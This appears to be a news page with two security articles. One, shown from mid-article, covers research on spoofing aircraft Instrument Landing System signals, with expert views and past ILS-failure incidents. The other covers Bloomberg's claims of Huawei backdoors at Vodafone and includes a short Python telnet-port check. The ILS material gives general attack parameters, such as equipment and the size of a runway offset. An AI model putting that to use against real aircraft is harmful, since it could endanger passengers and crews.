Another reason for measured skepticism is the difficulty of carrying out an attack. In addition to the SDR, the equipment needed would likely require directional antennas and an amplifier to boost the signal. It would be hard to sneak all that gear onto a plane in the event the hacker chose an onboard attack. If the hacker chose to mount the attack from the ground, it would likely require a great deal of work to get the gear aligned with a runway without attracting attention. What’s more, airports typically monitor for interference on sensitive frequencies, making it possible an attack would be shut down shortly after it started.

In 2012, researcher Brad Haines, who often goes by the handle Renderman, exposed vulnerabilities in the automatic dependent surveillance broadcast (ADS-B), the system planes use to determine their location and broadcast it to others. He summed up the difficulties of real-world ILS spoofing this way:

If everything lined up for this, location, concealment of gear, poor weather conditions, a suitable target, a motivated, funded and intelligent attacker, what would their result be? At absolute worst, a plane hits the grass and some injuries or fatalities are sustained, but emergency crews and plane safety design means you’re unlikely to have a spectacular fire with all hands lost. At that point, airport landings are suspended, so the attacker can’t repeat the attack. At best, pilot notices the misalignment, browns their shorts, pulls up and goes around and calls in a maintenance note that something is funky with the ILS and the airport starts investigating, which means the attacker is not likely wanting to stay nearby.

So if all that came together, the net result seems pretty minor. Compare that to the return on investment and economic effect of one jackass with a $1,000 drone flying outside Heathrow for 2 days. Bet the drone was far more effective and certain to work than this attack.

Still, the researchers said that risks exist. Planes that aren’t landing according to the glide path—the imaginary vertical path a plane follows when making a perfect landing—are much harder to detect even when visibility is good. What’s more, some high-volume airports, to keep planes moving, instruct pilots to delay making a fly-around decision even when visibility is extremely limited. The Federal Aviation Administration’s Category III approach operations, which are in effect for many US airports, call for a decision height of just 50 feet, for instance. Similar guidelines are in effect throughout Europe. Those guidelines leave a pilot with little time to safely abort a landing should a visual reference not line up with ILS readings.

“Detecting and recovering from any instrument failures during crucial landing procedures is one of the toughest challenges in modern aviation,” the researchers wrote in their paper, titled Wireless Attacks on Aircraft Instrument Landing Systems, which has been accepted at the 28th USENIX Security Symposium. “Given the heavy reliance on ILS and instruments in general, malfunctions and adversarial interference can be catastrophic especially in autonomous approaches and flights.”

What happens with ILS failures

Several near-catastrophic landings in recent years demonstrate the danger posed by ILS failures. In 2011, Singapore Airlines flight SQ327, with 143 passengers and 15 crew aboard, unexpectedly banked to the left about 30 feet above a runway at the Munich airport in Germany. Upon landing, the Boeing 777-300 careened off the runway to the left, then veered to the right, crossed the centerline, and came to a stop with all of its landing gear in the grass to the right of the runway. The image directly below shows the aftermath. The image below that depicts the course the plane took.

An instrument landing system malfunction caused Singapore Airlines flight SQ327 to slide off the runway shortly after landing in Munich in 2011.

The path Singapore Airlines flight SQ327 took after landing.

An incident report published by Germany’s Federal Bureau of Aircraft Accident Investigation said that the jet missed its intended touchdown point by about 1,600 feet. Investigators said one contributor to the accident was localizer signals that had been distorted by a departing aircraft. While there were no reported injuries, the event underscored the severity of ILS malfunctions. Other near-catastrophic incidents involving ILS failures include Air New Zealand flight NZ60 in 2000 and Ryanair flight FR3531 in 2013. The following video helps explain what went wrong in the latter event.

[Video: Animation – Stick shaker warning and pitch-up upsets]

Vaibhav Sharma runs global operations for a Silicon Valley security company and has flown small airplanes since 2006. He is also a licensed ham radio operator and a volunteer with the Civil Air Patrol, where he is trained as a search-and-rescue flight crew member and radio communications team member. He’s the pilot controlling the X-Plane flight simulator in the video demonstrating the spoofing attack that causes the plane to land to the right of the runway.

Sharma told Ars:

This ILS attack is realistic but the effectiveness will depend on a combination of factors including the attacker’s understanding of the aviation navigation systems and conditions in the approach environment. If used appropriately, an attacker could use this technique to steer aircraft towards obstacles around the airport environment and if that was done in low visibility conditions, it would be very hard for the flight crew to identify and deal with the deviations.

He said the attacks had the potential to threaten both small aircraft and large jet planes but for different reasons. Smaller planes tend to move at slower speeds than big jets. That gives pilots more time to react. Big jets, on the other hand, typically have more crew members in the cockpit to react to adverse events, and pilots typically receive more frequent and rigorous training.

The most important consideration for both big and small planes, he said, is likely to be environmental conditions, such as weather at the time of landing.

“The type of attack demonstrated here would probably be more effective when the pilots have to depend primarily on instruments to execute a successful landing,” Sharma said. “Such cases include night landings with reduced visibility or a combination of both in a busy airspace requiring pilots to handle much higher workloads and ultimately depending on automation.”

Aanjhan Ranganathan, a Northeastern University researcher who helped develop the attack, told Ars that GPS systems provide little fallback when ILS fails. One reason: the types of runway misalignments that would be effective in a spoofing attack typically range from about 32 feet to 50 feet, since pilots or air traffic controllers will visually detect anything bigger. It’s extremely difficult for GPS to detect malicious offsets that small. A second reason is that GPS spoofing attacks are relatively easy to carry out.

“I can spoof GPS in synch with this [ILS] spoofing,” Ranganathan said. “It’s a matter of how motivated the attacker is.”

Bloomberg alleges Huawei routers and network gear are backdoored

A 5G logo displayed on an Android mobile phone with the Huawei logo in the background. (Portugal, March 4, 2019)

Vodafone, the largest mobile network operator in Europe, found backdoors in Huawei equipment between 2009 and 2011, reports Bloomberg. With these backdoors, Huawei could have gained unauthorized access to Vodafone’s “fixed-line network in Italy.” But Vodafone disagrees, saying that while it did discover some security vulnerabilities in Huawei equipment, these were fixed by Huawei and in any case were not remotely accessible, and hence could not have been used by Huawei.

Bloomberg’s claims are based on Vodafone’s internal security documentation and “people involved in the situation.” Several different “backdoors” are described: unsecured telnet access to home routers, along with “backdoors” in optical service nodes (which connect last-mile distribution networks to optical backbone networks) and “broadband network gateways” (BNG) (which sit between broadband users and the backbone network, providing access control, authentication, and similar services).

In response to Bloomberg, Vodafone said that the router vulnerabilities were found and fixed in 2011 and the BNG flaws were found and fixed in 2012. While it has documentation about some optical service node vulnerabilities, Vodafone continued, it has no information about when they were fixed. Further, the network operator said that it has no evidence of issues outside Italy.

The sources speaking to Bloomberg contest this. They claim that the vulnerabilities persisted after 2012 and that the same flaws could be found in Vodafone-deployed Huawei equipment in the UK, Germany, Spain, and Portugal. In spite of this, Vodafone continued to buy equipment from the Chinese firm because it was so cost competitive.

The sources also claim that the story was not so simple as “Vodafone reports bug, Huawei fixes bug.” Vodafone Italy found that Huawei’s routers had unsecured telnet access, and the company told Huawei to remove it. Huawei told Vodafone that it had done so, but further examination of the routers found that telnet could be re-enabled. Vodafone told Huawei that Vodafone wanted it removed entirely, only to be told by Huawei that the company needed to keep it for testing and configuration.

The Bloomberg report doesn’t offer any detail on the other alleged “backdoors” in the gateways or service nodes.

When is a front door a backdoor?

The accuracy of Bloomberg’s report hinges on the distinction between a vulnerability and a backdoor. A vulnerability is an accidental coding error that permits unauthorized parties to access the router (or other hardware). A backdoor, in contrast, is a deliberately written piece of code that permits unauthorized parties to access the router. While a backdoor could be written such that it’s obvious that it’s a backdoor (for example, one could imagine an authentication system that allowed anyone to log in with the password “backdoor”), any competent backdoor will look either like a legitimate feature or an accidental coding error.

Telnet access, for example, is a common feature of home routers. Typically, the telnet interface gives greater control over the router’s behavior than is available through the Web-based configuration interface that these devices usually have. The telnet interface is also easier to automate, making it easier to preconfigure the devices so that they’re properly set up for a particular ISP’s network. Even Huawei’s initial response to Vodafone’s request, which allowed users to re-enable the telnet service, isn’t out of the ordinary: it’s common for the Web front-ends to allow telnet to be turned off and on. Vodafone’s assertion that the telnet service wasn’t accessible from the Internet is also likely to be true; typically, these telnet services are only accessible from the local network side, not from the Internet IP address.
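
For what it's worth, a claim like "telnet was removed" is cheap to verify from the LAN side. A minimal probe, using only the standard library (the router address below is an assumption):

```python
import socket

def telnet_open(host: str, port: int = 23, timeout: float = 3.0) -> bool:
    """Check whether a device accepts connections on the telnet port; a
    quick, nonintrusive way to see if a 'removed' service is really gone."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Per the report, the service was reachable only from the local network,
# so run this from inside; the same check from the WAN side should fail.
print(telnet_open("192.168.1.1"))
```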

As such, Vodafone and Huawei’s posture that this isn’t a backdoor at all is entirely defensible, and Huawei has done nothing that’s particularly out of the ordinary. This is not to say that the hardware is not backdoored—routers with unauthenticated remote access or bypassable authentication have been found in the past and are likely to be found in the future, too. But there’s no indication that these particular Huawei issues are an attempt to backdoor the routers, and nothing in the Bloomberg report corroborates this specific claim.

What there is, however, is a concern fueled by the US government that Huawei wishes to compromise or undermine networks and systems belonging to the US and Europe, as well as a concern that the company tries to unlawfully use intellectual property taken from Western countries. Among Chinese firms, Huawei is viewed with particular suspicion due to its ties to the Chinese military.

Huawei’s CFO was arrested in Canada on behalf of the United States, which says that Huawei has violated US sanctions against Iran, and the company has also been indicted for stealing robotic phone-testing technology from T-Mobile. The US government has pressured domestic companies not to buy or sell Huawei hardware, and more broadly, the US has pushed its allies to avoid Huawei network hardware. Examination of Huawei’s firmware and software by the UK government has revealed a generally shoddy approach to security, but these problems appear to be carelessly written, buggy code that leaves systems hackable, rather than deliberately inserted backdoors.

This pressure is particularly acute when it comes to deploying 5G networks. Huawei’s 4G hardware is already widely deployed in Europe, and Huawei’s 5G hardware is aggressively priced and seen as critical to the timely deployment of 5G infrastructure in Europe. Vodafone, for its part, continued to buy Huawei gear until January of this year; further purchases have been paused because of the concerns about the company.